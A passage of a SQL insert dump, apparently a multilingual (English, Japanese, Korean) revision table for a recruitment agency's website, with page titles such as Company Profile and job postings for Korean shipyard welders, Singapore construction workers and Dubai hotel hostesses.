(25, 250, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690258345, 0, 0, 0, NULL, 'en', 0),
(25, 250, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690342918, 0, 0, 0, 1, 'en', 0),
(26, 251, 'en', 1, 2, 'Future Goal', 1688384477, 1689649658, 0, 0, 1, NULL, 'und', 0),
(26, 251, 'ja', 1, 2, '会社の目標', 1688384504, 1690084805, 0, 0, 0, NULL, 'en', 0),
(26, 251, 'ko', 1, 2, '회사의 미래 비전', 1688384529, 1690343116, 0, 0, 0, 1, 'en', 0),
(24, 252, 'en', 1, 2, 'Our Services', 1688384288, 1690343459, 0, 0, 1, 1, 'und', 0),
(24, 252, 'ja', 1, 2, '事業内容', 1688384311, 1690085236, 0, 0, 0, NULL, 'en', 0),
(24, 252, 'ko', 1, 2, '회사 서비스', 1688432702, 1690341799, 0, 0, 0, NULL, 'en', 0),
(24, 253, 'en', 1, 2, 'Our Services', 1688384288, 1690343459, 0, 0, 1, NULL, 'und', 0),
(24, 253, 'ja', 1, 2, '事業内容', 1688384311, 1690343563, 0, 0, 0, 1, 'en', 0),
(24, 253, 'ko', 1, 2, '회사 서비스', 1688432702, 1690341799, 0, 0, 0, NULL, 'en', 0),
(24, 254, 'en', 1, 2, 'Our Services', 1688384288, 1690343459, 0, 0, 1, NULL, 'und', 0),
(24, 254, 'ja', 1, 2, '事業内容', 1688384311, 1690343563, 0, 0, 0, NULL, 'en', 0),
(24, 254, 'ko', 1, 2, '회사 서비스', 1688432702, 1690343833, 0, 0, 0, 1, 'en', 0),
(27, 255, 'en', 1, 2, 'Company History', 1688384566, 1690282556, 0, 0, 1, NULL, 'und', 0),
(27, 255, 'ja', 1, 2, '会社沿革', 1688384583, 1690351069, 0, 0, 0, 1, 'en', 0),
(27, 255, 'ko', 1, 2, 'Company History', 1688384601, 1690282650, 0, 0, 0, NULL, 'en', 0),
(27, 256, 'en', 1, 2, 'Company History', 1688384566, 1690351396, 0, 0, 1, 1, 'und', 0),
(27, 256, 'ja', 1, 2, '会社沿革', 1688384583, 1690351069, 0, 0, 0, NULL, 'en', 0),
(27, 256, 'ko', 1, 2, 'Company History', 1688384601, 1690282650, 0, 0, 0, NULL, 'en', 0),
(31, 257, 'en', 1, 1, 'We are looking for professional Welders who wants to work at Korean Shipyards', 1690352681, 1690352771, 0, 0, 1, 1, 'und', 0),
(31, 258, 'en', 1, 1, 'We are looking for professional Welders who wants to work at Korean Shipyards', 1690352681, 1690352793, 0, 0, 1, NULL, 'und', 0),
(31, 259, 'en', 1, 1, 'We are looking for professional Welders who wants to work at Korean Shipyards', 1690352681, 1690357358, 0, 0, 1, 1, 'und', 0),
(11, 260, 'en', 1, 1, 'Contact Us', 1687305757, 1690447347, 0, 0, 1, 1, 'und', 0),
(11, 260, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690339970, 0, 0, 0, NULL, 'en', 0),
(11, 260, 'ko', 1, 2, '연락처', 1688383142, 1690340000, 0, 0, 0, NULL, 'en', 0),
(11, 261, 'en', 1, 1, 'Contact Us', 1687305757, 1690447347, 0, 0, 1, NULL, 'und', 0),
(11, 261, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690447452, 0, 0, 0, 1, 'en', 0),
(11, 261, 'ko', 1, 2, '연락처', 1688383142, 1690340000, 0, 0, 0, NULL, 'en', 0),
(11, 262, 'en', 1, 1, 'Contact Us', 1687305757, 1690447347, 0, 0, 1, NULL, 'und', 0),
(11, 262, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690447452, 0, 0, 0, NULL, 'en', 0),
(11, 262, 'ko', 1, 2, '연락처', 1688383142, 1690447520, 0, 0, 0, 1, 'en', 0),
(23, 263, 'en', 1, 2, 'Company Profile', 1688384143, 1690533094, 0, 0, 1, 1, 'und', 0),
(23, 263, 'ja', 1, 2, '会社情報', 1688384224, 1690084525, 0, 0, 0, NULL, 'en', 0),
(23, 263, 'ko', 1, 2, '회사 설립', 1688384243, 1690340246, 0, 0, 0, NULL, 'en', 0),
(23, 264, 'en', 1, 2, 'Company Profile', 1688384143, 1690537451, 0, 0, 1, 1, 'und', 0),
(23, 264, 'ja', 1, 2, '会社情報', 1688384224, 1690084525, 0, 0, 0, NULL, 'en', 0),
(23, 264, 'ko', 1, 2, '회사 설립', 1688384243, 1690340246, 0, 0, 0, NULL, 'en', 0),
(23, 265, 'en', 1, 2, 'Company Profile', 1688384143, 1690537451, 0, 0, 1, NULL, 'und', 0),
(23, 265, 'ja', 1, 2, '会社情報', 1688384224, 1690537991, 0, 0, 0, 1, 'en', 0),
(23, 265, 'ko', 1, 2, '회사 설립', 1688384243, 1690340246, 0, 0, 0, NULL, 'en', 0),
(23, 266, 'en', 1, 2, 'Company Profile', 1688384143, 1690537451, 0, 0, 1, NULL, 'und', 0),
(23, 266, 'ja', 1, 2, '会社情報', 1688384224, 1690537991, 0, 0, 0, NULL, 'en', 0),
(23, 266, 'ko', 1, 2, '회사 설립', 1688384243, 1690538470, 0, 0, 0, 1, 'en', 0),
(23, 267, 'en', 1, 2, 'Company Profile', 1688384143, 1690540427, 0, 0, 1, 1, 'und', 0),
(23, 267, 'ja', 1, 2, '会社情報', 1688384224, 1690537991, 0, 0, 0, NULL, 'en', 0),
(23, 267, 'ko', 1, 2, '회사 설립', 1688384243, 1690538470, 0, 0, 0, NULL, 'en', 0),
(27, 268, 'en', 1, 2, 'Company History', 1688384566, 1690541094, 0, 0, 1, 1, 'und', 0),
(27, 268, 'ja', 1, 2, '会社沿革', 1688384583, 1690351069, 0, 0, 0, NULL, 'en', 0),
(27, 268, 'ko', 1, 2, 'Company History', 1688384601, 1690282650, 0, 0, 0, NULL, 'en', 0),
(23, 269, 'en', 1, 2, 'Company Profile', 1688384143, 1690602399, 0, 0, 1, 1, 'und', 0),
(23, 269, 'ja', 1, 2, '会社情報', 1688384224, 1690537991, 0, 0, 0, NULL, 'en', 0),
(23, 269, 'ko', 1, 2, '회사 설립', 1688384243, 1690538470, 0, 0, 0, NULL, 'en', 0),
(23, 270, 'en', 1, 2, 'Company Profile', 1688384143, 1690602399, 0, 0, 1, NULL, 'und', 0),
(23, 270, 'ja', 1, 2, '会社情報', 1688384224, 1690602474, 0, 0, 0, 1, 'en', 0),
(23, 270, 'ko', 1, 2, '회사 설립', 1688384243, 1690538470, 0, 0, 0, NULL, 'en', 0),
(23, 271, 'en', 1, 2, 'Company Profile', 1688384143, 1690602399, 0, 0, 1, NULL, 'und', 0),
(23, 271, 'ja', 1, 2, '会社情報', 1688384224, 1690602474, 0, 0, 0, NULL, 'en', 0),
(23, 271, 'ko', 1, 2, '회사 설립', 1688384243, 1690602548, 0, 0, 0, 1, 'en', 0),
(27, 272, 'en', 1, 2, 'Company History', 1688384566, 1690604922, 0, 0, 1, 1, 'und', 0),
(27, 272, 'ja', 1, 2, '会社沿革', 1688384583, 1690351069, 0, 0, 0, NULL, 'en', 0),
(27, 272, 'ko', 1, 2, 'Company History', 1688384601, 1690282650, 0, 0, 0, NULL, 'en', 0),
(27, 273, 'en', 1, 2, 'Company History', 1688384566, 1690604922, 0, 0, 1, NULL, 'und', 0),
(27, 273, 'ja', 1, 2, '会社沿革', 1688384583, 1690605069, 0, 0, 0, 1, 'en', 0),
(27, 273, 'ko', 1, 2, 'Company History', 1688384601, 1690282650, 0, 0, 0, NULL, 'en', 0),
(23, 274, 'en', 1, 2, 'Company Profile', 1688384143, 1690609876, 0, 0, 1, 1, 'und', 0),
(23, 274, 'ja', 1, 2, '会社情報', 1688384224, 1690602474, 0, 0, 0, NULL, 'en', 0),
(23, 274, 'ko', 1, 2, '회사 설립', 1688384243, 1690602548, 0, 0, 0, NULL, 'en', 0),
(23, 275, 'en', 1, 2, 'Company Profile', 1688384143, 1690609876, 0, 0, 1, NULL, 'und', 0),
(23, 275, 'ja', 1, 2, '会社情報', 1688384224, 1690609912, 0, 0, 0, 1, 'en', 0),
(23, 275, 'ko', 1, 2, '회사 설립', 1688384243, 1690602548, 0, 0, 0, NULL, 'en', 0),
(23, 276, 'en', 1, 2, 'Company Profile', 1688384143, 1690609876, 0, 0, 1, NULL, 'und', 0),
(23, 276, 'ja', 1, 2, '会社情報', 1688384224, 1690609912, 0, 0, 0, NULL, 'en', 0),
(23, 276, 'ko', 1, 2, '회사 설립', 1688384243, 1690609942, 0, 0, 0, 1, 'en', 0),
(24, 277, 'en', 1, 2, 'Our Services', 1688384288, 1690775221, 0, 0, 1, 1, 'und', 0),
(24, 277, 'ja', 1, 2, '事業内容', 1688384311, 1690343563, 0, 0, 0, NULL, 'en', 0),
(24, 277, 'ko', 1, 2, '회사 서비스', 1688432702, 1690343833, 0, 0, 0, NULL, 'en', 0),
(24, 278, 'en', 1, 2, 'Our Services', 1688384288, 1690775221, 0, 0, 1, NULL, 'und', 0),
(24, 278, 'ja', 1, 2, '事業内容', 1688384311, 1690781869, 0, 0, 0, 1, 'en', 0),
(24, 278, 'ko', 1, 2, '회사 서비스', 1688432702, 1690343833, 0, 0, 0, NULL, 'en', 0),
(24, 279, 'en', 1, 2, 'Our Services', 1688384288, 1690775221, 0, 0, 1, NULL, 'und', 0),
(24, 279, 'ja', 1, 2, '事業内容', 1688384311, 1690781869, 0, 0, 0, NULL, 'en', 0),
(24, 279, 'ko', 1, 2, '회사 서비스', 1688432702, 1690781893, 0, 0, 0, 1, 'en', 0),
(25, 280, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690782429, 0, 0, 1, 1, 'und', 0),
(25, 280, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690258345, 0, 0, 0, NULL, 'en', 0),
(25, 280, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690342918, 0, 0, 0, NULL, 'en', 0),
(25, 281, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690782429, 0, 0, 1, NULL, 'und', 0),
(25, 281, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690782457, 0, 0, 0, 1, 'en', 0),
(25, 281, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690342918, 0, 0, 0, NULL, 'en', 0),
(25, 282, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690782429, 0, 0, 1, NULL, 'und', 0),
(25, 282, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690782457, 0, 0, 0, NULL, 'en', 0),
(25, 282, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690782479, 0, 0, 0, 1, 'en', 0),
(25, 283, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690782429, 0, 0, 1, NULL, 'und', 0),
(25, 283, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690782708, 0, 0, 0, 1, 'en', 0),
(25, 283, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690782479, 0, 0, 0, NULL, 'en', 0),
(25, 284, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690782429, 0, 0, 1, NULL, 'und', 0),
(25, 284, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690782722, 0, 0, 0, NULL, 'en', 0),
(25, 284, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690782479, 0, 0, 0, NULL, 'en', 0),
(25, 285, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690782774, 0, 0, 1, 1, 'und', 0),
(25, 285, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690782722, 0, 0, 0, NULL, 'en', 0),
(25, 285, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690782479, 0, 0, 0, NULL, 'en', 0),
(25, 286, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690782799, 0, 0, 1, 1, 'und', 0),
(25, 286, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690782722, 0, 0, 0, NULL, 'en', 0),
(25, 286, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690782479, 0, 0, 0, NULL, 'en', 0),
(25, 287, 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690782799, 0, 0, 1, NULL, 'und', 0),
(25, 287, 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690782722, 0, 0, 0, NULL, 'en', 0),
(25, 287, 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690782855, 0, 0, 0, 1, 'en', 0),
(7, 288, 'en', 1, 1, 'E-7 visa - A special Ability visa for Foreign Nationals.', 1687240759, 1688547023, 0, 0, 1, NULL, 'und', 0),
(7, 288, 'ja', 1, 2, 'E-7ビザは外国人に対する特定能力を持つ方のための特別なビザです。', 1688388674, 1689929528, 0, 0, 0, NULL, 'en', 0),
(7, 288, 'ko', 1, 2, 'E-7 visa - A special Ability visa for Foreign Nationals.', 1688388683, 1690783384, 0, 0, 0, 1, 'en', 0),
(11, 289, 'en', 1, 1, 'Contact Us', 1687305757, 1690956144, 0, 0, 1, 1, 'und', 0),
(11, 289, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690447452, 0, 0, 0, NULL, 'en', 0),
(11, 289, 'ko', 1, 2, '연락처', 1688383142, 1690447520, 0, 0, 0, NULL, 'en', 0),
(11, 290, 'en', 1, 1, 'Contact Us', 1687305757, 1690956144, 0, 0, 1, NULL, 'und', 0),
(11, 290, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690956179, 0, 0, 0, 1, 'en', 0),
(11, 290, 'ko', 1, 2, '연락처', 1688383142, 1690447520, 0, 0, 0, NULL, 'en', 0),
(11, 291, 'en', 1, 1, 'Contact Us', 1687305757, 1690956144, 0, 0, 1, NULL, 'und', 0),
(11, 291, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1690956179, 0, 0, 0, NULL, 'en', 0),
(11, 291, 'ko', 1, 2, '연락처', 1688383142, 1690956203, 0, 0, 0, 1, 'en', 0),
(23, 292, 'en', 1, 2, 'Company Profile', 1688384143, 1691032362, 0, 0, 1, 1, 'und', 0),
(23, 292, 'ja', 1, 2, '会社情報', 1688384224, 1690609912, 0, 0, 0, NULL, 'en', 0),
(23, 292, 'ko', 1, 2, '회사 설립', 1688384243, 1690609942, 0, 0, 0, NULL, 'en', 0),
(23, 293, 'en', 1, 2, 'Company Profile', 1688384143, 1691032362, 0, 0, 1, NULL, 'und', 0),
(23, 293, 'ja', 1, 2, '会社情報', 1688384224, 1691032414, 0, 0, 0, 1, 'en', 0),
(23, 293, 'ko', 1, 2, '회사 설립', 1688384243, 1690609942, 0, 0, 0, NULL, 'en', 0),
(23, 294, 'en', 1, 2, 'Company Profile', 1688384143, 1691032362, 0, 0, 1, NULL, 'und', 0),
(23, 294, 'ja', 1, 2, '会社情報', 1688384224, 1691032414, 0, 0, 0, NULL, 'en', 0),
(23, 294, 'ko', 1, 2, '회사 설립', 1688384243, 1691032457, 0, 0, 0, 1, 'en', 0),
(23, 295, 'en', 1, 2, 'Company Profile', 1688384143, 1691474331, 0, 0, 1, 1, 'und', 0),
(23, 295, 'ja', 1, 2, '会社情報', 1688384224, 1691032414, 0, 0, 0, NULL, 'en', 0),
(23, 295, 'ko', 1, 2, '회사 설립', 1688384243, 1691032457, 0, 0, 0, NULL, 'en', 0),
(23, 296, 'en', 1, 2, 'Company Profile', 1688384143, 1691474331, 0, 0, 1, NULL, 'und', 0),
(23, 296, 'ja', 1, 2, '会社情報', 1688384224, 1691474463, 0, 0, 0, 1, 'en', 0),
(23, 296, 'ko', 1, 2, '회사 설립', 1688384243, 1691032457, 0, 0, 0, NULL, 'en', 0),
(23, 297, 'en', 1, 2, 'Company Profile', 1688384143, 1691474331, 0, 0, 1, NULL, 'und', 0),
(23, 297, 'ja', 1, 2, '会社情報', 1688384224, 1691474463, 0, 0, 0, NULL, 'en', 0),
(23, 297, 'ko', 1, 2, '회사 설립', 1688384243, 1691474590, 0, 0, 0, 1, 'en', 0),
(23, 298, 'en', 1, 2, 'Company Profile', 1688384143, 1691560518, 0, 0, 1, 1, 'und', 0),
(23, 298, 'ja', 1, 2, '会社情報', 1688384224, 1691474463, 0, 0, 0, NULL, 'en', 0),
(23, 298, 'ko', 1, 2, '회사 설립', 1688384243, 1691474590, 0, 0, 0, NULL, 'en', 0),
(23, 299, 'en', 1, 2, 'Company Profile', 1688384143, 1691560518, 0, 0, 1, NULL, 'und', 0),
(23, 299, 'ja', 1, 2, '会社情報', 1688384224, 1691560565, 0, 0, 0, 1, 'en', 0),
(23, 299, 'ko', 1, 2, '회사 설립', 1688384243, 1691474590, 0, 0, 0, NULL, 'en', 0),
(23, 300, 'en', 1, 2, 'Company Profile', 1688384143, 1691560518, 0, 0, 1, NULL, 'und', 0),
(23, 300, 'ja', 1, 2, '会社情報', 1688384224, 1691560565, 0, 0, 0, NULL, 'en', 0),
(23, 300, 'ko', 1, 2, '회사 설립', 1688384243, 1691560610, 0, 0, 0, 1, 'en', 0),
(24, 301, 'en', 1, 2, 'Our Services', 1688384288, 1691560671, 0, 0, 1, 1, 'und', 0),
(24, 301, 'ja', 1, 2, '事業内容', 1688384311, 1690781869, 0, 0, 0, NULL, 'en', 0),
(24, 301, 'ko', 1, 2, '회사 서비스', 1688432702, 1690781893, 0, 0, 0, NULL, 'en', 0),
(24, 302, 'en', 1, 2, 'Our Services', 1688384288, 1691560671, 0, 0, 1, NULL, 'und', 0),
(24, 302, 'ja', 1, 2, '事業内容', 1688384311, 1691560713, 0, 0, 0, 1, 'en', 0),
(24, 302, 'ko', 1, 2, '회사 서비스', 1688432702, 1690781893, 0, 0, 0, NULL, 'en', 0),
(24, 303, 'en', 1, 2, 'Our Services', 1688384288, 1691560671, 0, 0, 1, NULL, 'und', 0),
(24, 303, 'ja', 1, 2, '事業内容', 1688384311, 1691560713, 0, 0, 0, NULL, 'en', 0),
(24, 303, 'ko', 1, 2, '회사 서비스', 1688432702, 1691560763, 0, 0, 0, 1, 'en', 0),
(23, 304, 'en', 1, 2, 'Company Profile', 1688384143, 1692068546, 0, 0, 1, 1, 'und', 0),
(23, 304, 'ja', 1, 2, '会社情報', 1688384224, 1691560565, 0, 0, 0, NULL, 'en', 0),
(23, 304, 'ko', 1, 2, '회사 설립', 1688384243, 1691560610, 0, 0, 0, NULL, 'en', 0),
(23, 305, 'en', 1, 2, 'Company Profile', 1688384143, 1692068546, 0, 0, 1, NULL, 'und', 0),
(23, 305, 'ja', 1, 2, '会社情報', 1688384224, 1692068740, 0, 0, 0, 1, 'en', 0),
(23, 305, 'ko', 1, 2, '회사 설립', 1688384243, 1691560610, 0, 0, 0, NULL, 'en', 0),
(23, 306, 'en', 1, 2, 'Company Profile', 1688384143, 1692068546, 0, 0, 1, NULL, 'und', 0),
(23, 306, 'ja', 1, 2, '会社情報', 1688384224, 1692068740, 0, 0, 0, NULL, 'en', 0),
(23, 306, 'ko', 1, 2, '회사 설립', 1688384243, 1692068891, 0, 0, 0, 1, 'en', 0),
(26, 307, 'en', 1, 2, 'Future Goal', 1688384477, 1692069077, 0, 0, 1, 1, 'und', 0),
(26, 307, 'ja', 1, 2, '会社の目標', 1688384504, 1690084805, 0, 0, 0, NULL, 'en', 0),
(26, 307, 'ko', 1, 2, '회사의 미래 비전', 1688384529, 1690343116, 0, 0, 0, NULL, 'en', 0),
(26, 308, 'en', 1, 2, 'Future Goal', 1688384477, 1692069077, 0, 0, 1, NULL, 'und', 0),
(26, 308, 'ja', 1, 2, '会社の目標', 1688384504, 1692069113, 0, 0, 0, 1, 'en', 0),
(26, 308, 'ko', 1, 2, '회사의 미래 비전', 1688384529, 1690343116, 0, 0, 0, NULL, 'en', 0),
(26, 309, 'en', 1, 2, 'Future Goal', 1688384477, 1692069077, 0, 0, 1, NULL, 'und', 0),
(26, 309, 'ja', 1, 2, '会社の目標', 1688384504, 1692069113, 0, 0, 0, NULL, 'en', 0),
(26, 309, 'ko', 1, 2, '회사의 미래 비전', 1688384529, 1692069142, 0, 0, 0, 1, 'en', 0),
(24, 310, 'en', 1, 2, 'Our Services', 1688384288, 1692069243, 0, 0, 1, 1, 'und', 0),
(24, 310, 'ja', 1, 2, '事業内容', 1688384311, 1691560713, 0, 0, 0, NULL, 'en', 0),
(24, 310, 'ko', 1, 2, '회사 서비스', 1688432702, 1691560763, 0, 0, 0, NULL, 'en', 0),
(24, 311, 'en', 1, 2, 'Our Services', 1688384288, 1692069243, 0, 0, 1, NULL, 'und', 0),
(24, 311, 'ja', 1, 2, '事業内容', 1688384311, 1692069330, 0, 0, 0, 1, 'en', 0),
(24, 311, 'ko', 1, 2, '회사 서비스', 1688432702, 1691560763, 0, 0, 0, NULL, 'en', 0),
(24, 312, 'en', 1, 2, 'Our Services', 1688384288, 1692069243, 0, 0, 1, NULL, 'und', 0),
(24, 312, 'ja', 1, 2, '事業内容', 1688384311, 1692069330, 0, 0, 0, NULL, 'en', 0),
(24, 312, 'ko', 1, 2, '회사 서비스', 1688432702, 1692069414, 0, 0, 0, 1, 'en', 0),
(24, 313, 'en', 1, 2, 'Our Services', 1688384288, 1692069461, 0, 0, 1, 1, 'und', 0),
(24, 313, 'ja', 1, 2, '事業内容', 1688384311, 1692069330, 0, 0, 0, NULL, 'en', 0),
(24, 313, 'ko', 1, 2, '회사 서비스', 1688432702, 1692069414, 0, 0, 0, NULL, 'en', 0),
(11, 314, 'en', 1, 1, 'Contact Us', 1687305757, 1690956144, 0, 0, 1, NULL, 'und', 0),
(11, 314, 'ja', 1, 2, 'お問い合わせ', 1688383131, 1692240899, 0, 0, 0, 1, 'en', 0),
(11, 314, 'ko', 1, 2, '연락처', 1688383142, 1690956203, 0, 0, 0, NULL, 'en', 0),
(5, 315, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 315, 'ja', 1, 2, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。', 1688388941, 1692248647, 0, 0, 0, NULL, 'en', 0),
(5, 315, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(10, 316, 'en', 1, 1, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1687265813, 1688361721, 0, 0, 1, NULL, 'und', 0),
(10, 316, 'ja', 1, 2, '韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。', 1688388899, 1692248661, 0, 0, 0, NULL, 'en', 0),
(10, 316, 'ko', 1, 2, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1688388912, 1688388916, 0, 0, 0, NULL, 'en', 0),
(18, 317, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 317, 'ja', 1, 2, 'ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1688388901, 1692248676, 0, 0, 0, NULL, 'en', 0),
(18, 317, 'ko', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388914, 1688388919, 0, 0, 0, NULL, 'en', 0),
(5, 318, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 318, 'ja', 1, 2, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。', 1688388941, 1692249018, 0, 0, 0, NULL, 'en', 0),
(5, 318, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(5, 319, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 319, 'ja', 1, 2, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。', 1688388941, 1692249072, 0, 0, 0, NULL, 'en', 0),
(5, 319, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(18, 320, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 320, 'ja', 1, 2, 'ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1688388901, 1692249082, 0, 0, 0, NULL, 'en', 0),
(18, 320, 'ko', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388914, 1688388919, 0, 0, 0, NULL, 'en', 0),
(10, 321, 'en', 1, 1, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1687265813, 1688361721, 0, 0, 1, NULL, 'und', 0),
(10, 321, 'ja', 1, 2, '韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。', 1688388899, 1692249091, 0, 0, 0, NULL, 'en', 0),
(10, 321, 'ko', 1, 2, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1688388912, 1688388916, 0, 0, 0, NULL, 'en', 0),
(5, 322, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 322, 'ja', 1, 2, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています。', 1688388941, 1692249889, 0, 0, 0, 1, 'en', 0),
(5, 322, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(5, 323, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 323, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(5, 324, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 324, 'ja', 1, 1, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています', 1692250348, 1692250406, 0, 0, 0, 1, 'en', 0),
(5, 324, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(5, 325, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 325, 'ja', 1, 1, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています', 1692250348, 1692250554, 0, 0, 0, NULL, 'en', 0),
(5, 325, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(5, 326, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 326, 'ja', 1, 1, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています', 1692250348, 1692250660, 0, 0, 0, NULL, 'en', 0),
(5, 326, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(18, 336, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 336, 'ja', 1, 2, 'ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1688388901, 1692254337, 0, 0, 0, NULL, 'en', 0),
(18, 336, 'ko', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388914, 1688388919, 0, 0, 0, NULL, 'en', 0),
(18, 337, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 337, 'ja', 1, 2, 'ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1688388901, 1692254414, 0, 0, 0, NULL, 'en', 0),
(18, 337, 'ko', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388914, 1688388919, 0, 0, 0, NULL, 'en', 0),
(18, 338, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 338, 'ja', 1, 2, 'ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1688388901, 1692254441, 0, 0, 0, NULL, 'en', 0),
